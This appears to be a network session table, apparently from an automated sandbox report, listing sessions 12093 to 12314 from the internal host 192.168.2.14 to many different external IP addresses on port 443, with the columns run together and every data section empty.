                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12093192.168.2.1446770166.78.161.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12094192.168.2.143739057.91.240.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12095192.168.2.145538260.205.145.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12096192.168.2.143867497.126.219.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12097192.168.2.144051836.108.142.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12098192.168.2.1458204186.53.243.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12099192.168.2.1454464108.118.89.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12100192.168.2.145204019.234.83.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12101192.168.2.1458248176.200.118.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12102192.168.2.145765859.114.159.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12103192.168.2.1433904170.203.231.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12104192.168.2.1436934104.212.2.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12105192.168.2.1450754194.10.5.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12106192.168.2.144624848.120.64.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12107192.168.2.1454560148.115.17.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12108192.168.2.1438818146.93.226.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12109192.168.2.1453824165.116.219.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12110192.168.2.1446816219.14.44.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12111192.168.2.144536845.49.3.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12112192.168.2.1458204186.104.67.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12113192.168.2.145612663.11.242.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12114192.168.2.144008260.7.33.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12115192.168.2.1453516191.153.242.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12116192.168.2.1443712180.133.115.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12117192.168.2.1458020120.139.18.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12118192.168.2.1441884176.53.218.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12119192.168.2.1460560189.29.24.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12120192.168.2.144582490.71.94.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12121192.168.2.144486492.103.157.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12122192.168.2.1440738189.87.9.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12123192.168.2.144984667.246.15.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12124192.168.2.1436256114.41.89.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12125192.168.2.1445722209.154.128.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12126192.168.2.1454300165.27.140.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12127192.168.2.1452876188.162.60.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12128192.168.2.1450804179.41.167.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12129192.168.2.1451932115.69.222.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12130192.168.2.144543817.176.218.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12131192.168.2.1445254111.178.254.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12132192.168.2.1441878165.181.214.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12133192.168.2.143775417.253.135.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12134192.168.2.145256892.108.17.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12135192.168.2.1451694186.143.150.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12136192.168.2.1439626141.83.131.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12137192.168.2.143845676.54.59.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12138192.168.2.1451648121.237.57.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12139192.168.2.1451966158.200.164.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12140192.168.2.144215485.222.181.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12141192.168.2.1447258129.86.173.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12142192.168.2.1436048138.30.184.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12143192.168.2.1458034211.107.251.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12144192.168.2.1438926147.51.57.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12145192.168.2.1438772141.55.87.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12146192.168.2.1433654165.238.95.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12147192.168.2.1456122222.69.191.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12148192.168.2.1448374109.204.50.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12149192.168.2.145789652.57.202.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12150192.168.2.1450558107.169.41.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12151192.168.2.143845054.215.140.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12152192.168.2.1445980111.46.240.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12153192.168.2.1438410107.186.156.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12154192.168.2.1440964115.33.233.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12155192.168.2.145910870.113.32.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12156192.168.2.145629438.68.15.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12157192.168.2.143460290.175.13.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12158192.168.2.14403105.221.171.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12159192.168.2.143573848.245.23.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12160192.168.2.143509459.45.211.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12161192.168.2.144229451.128.11.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12162192.168.2.1437028146.96.166.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12163192.168.2.1434460212.242.242.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12164192.168.2.144768871.185.208.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12165192.168.2.144244639.98.0.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12166192.168.2.1458546173.207.152.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12167192.168.2.143656074.239.158.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12168192.168.2.143813059.40.156.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12169192.168.2.1435900196.228.221.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12170192.168.2.143842825.212.18.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12171192.168.2.1445578147.145.189.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12172192.168.2.1452382205.193.239.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12173192.168.2.1456896170.226.78.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12174192.168.2.144014094.243.227.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12175192.168.2.1450738175.198.10.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12176192.168.2.143333694.102.125.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12177192.168.2.1438212138.193.232.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12178192.168.2.145292883.6.215.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12179192.168.2.144809689.101.71.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12180192.168.2.1447108138.195.119.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12181192.168.2.143885627.76.39.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12182192.168.2.145959282.89.31.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12183192.168.2.1441504201.227.104.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12184192.168.2.1438374124.94.115.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12185192.168.2.1451548201.218.226.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12186192.168.2.1456554168.49.182.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12187192.168.2.145618850.64.151.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12188192.168.2.1442850133.96.12.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12189192.168.2.1441576211.21.184.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12190192.168.2.1453696100.162.181.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12191192.168.2.1443474168.39.24.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12192192.168.2.144661041.48.239.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12193192.168.2.145977267.187.13.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12194192.168.2.1447148213.108.0.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12195192.168.2.1460848147.149.190.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12196192.168.2.1435386130.226.14.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12197192.168.2.145813049.12.143.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12198192.168.2.1459810139.169.141.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12199192.168.2.1459932193.119.245.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12200192.168.2.1448642156.168.51.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12201192.168.2.1439744201.231.182.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12202192.168.2.1448400190.46.204.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12203192.168.2.1457776174.140.174.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12204192.168.2.1437020173.14.233.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12205192.168.2.1460728124.184.45.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12206192.168.2.145608613.170.111.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12207192.168.2.143880290.243.16.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12208192.168.2.144536670.183.9.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12209192.168.2.145010635.120.118.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12210192.168.2.143424837.27.95.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12211192.168.2.1440954100.146.12.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12212192.168.2.144303627.99.106.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12213192.168.2.143967475.109.142.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12214192.168.2.145179289.154.158.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12215192.168.2.1457238207.234.23.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12216192.168.2.1432856153.254.163.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12217192.168.2.145593494.80.191.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12218192.168.2.143337018.88.188.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12219192.168.2.144350666.74.201.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12220192.168.2.1434862190.99.48.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12221192.168.2.143703073.93.194.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12222192.168.2.1450442164.173.223.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12223192.168.2.144407214.92.123.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12224192.168.2.1445782204.215.213.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12225192.168.2.1451908167.203.246.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12226192.168.2.1435132202.140.85.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12227192.168.2.1439676130.245.152.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12228192.168.2.143684290.251.191.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12229192.168.2.1449238121.105.48.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12230192.168.2.14440449.110.140.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12231192.168.2.144400073.161.205.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12232192.168.2.1455618218.227.89.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12233192.168.2.1456464149.114.224.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12234192.168.2.1446286195.212.208.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12235192.168.2.145250682.121.204.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12236192.168.2.1454754149.160.11.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12237192.168.2.1450696108.168.109.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12238192.168.2.1443118159.61.185.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12239192.168.2.1440732186.10.170.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12240192.168.2.145376479.168.133.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12241192.168.2.1460990187.159.253.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12242192.168.2.144076875.13.223.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12243192.168.2.1459668161.137.139.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12244192.168.2.143370251.110.207.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12245192.168.2.1441594173.81.40.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12246192.168.2.1435422173.92.112.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12247192.168.2.1445706120.161.158.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12248192.168.2.144816065.191.192.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12249192.168.2.1437970150.206.3.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12250192.168.2.1454980208.190.2.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12251192.168.2.146069240.29.97.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12252192.168.2.1451310112.169.193.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12253192.168.2.1460664198.82.52.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12254192.168.2.1440770156.43.36.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12255192.168.2.144902432.12.159.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12256192.168.2.145254846.55.29.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12257192.168.2.143658481.140.211.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12258192.168.2.144181657.53.201.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12259192.168.2.1439186189.54.170.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12260192.168.2.1455166189.112.125.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12261192.168.2.1436138167.97.97.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12262192.168.2.1450166128.251.52.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12263192.168.2.1455116200.239.189.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12264192.168.2.144084677.58.37.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12265192.168.2.1449192150.146.79.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12266192.168.2.144869066.149.23.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12267192.168.2.1439736223.63.51.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12268192.168.2.1447058208.81.131.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12269192.168.2.1438440149.140.13.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12270192.168.2.1458186148.91.5.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12271192.168.2.145822697.167.56.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12272192.168.2.143613696.108.30.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12273192.168.2.1454200203.50.122.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12274192.168.2.14526944.26.118.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12275192.168.2.143591270.120.8.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12276192.168.2.1452688164.84.199.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12277192.168.2.144535435.242.73.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12278192.168.2.1453356152.60.10.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12279192.168.2.1457216164.27.22.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12280192.168.2.1450238133.188.202.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12281192.168.2.1434286179.10.0.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12282192.168.2.1438978125.4.59.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12283192.168.2.1449432181.51.240.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12284192.168.2.1443344126.174.98.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12285192.168.2.1449222132.255.10.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12286192.168.2.1458202119.42.135.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12287192.168.2.1439810163.122.225.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12288192.168.2.145659644.47.39.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12289192.168.2.1435670175.252.86.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12290192.168.2.144411818.72.215.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12291192.168.2.144947458.38.172.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12292192.168.2.1457352201.109.35.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12293192.168.2.1447828146.213.150.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12294192.168.2.144179263.205.198.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12295192.168.2.145074267.170.127.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12296192.168.2.1446628207.80.56.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12297192.168.2.144646277.223.47.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12298192.168.2.143305419.141.157.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12299192.168.2.145989666.98.66.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12300192.168.2.1437394172.149.26.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12301192.168.2.1447576156.185.190.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12302192.168.2.1443974158.110.96.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12303192.168.2.1443576177.217.231.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12304192.168.2.1457488181.123.88.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12305192.168.2.1450966110.240.83.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12306192.168.2.143700460.94.191.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12307192.168.2.1435404196.8.101.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12308192.168.2.1443866210.5.6.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12309192.168.2.144408848.128.210.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12310192.168.2.1439446115.202.14.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12311192.168.2.143753818.206.64.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12312192.168.2.1453044125.21.40.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12313192.168.2.1455828117.196.231.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12314192.168.2.1450136197.34.235.199443
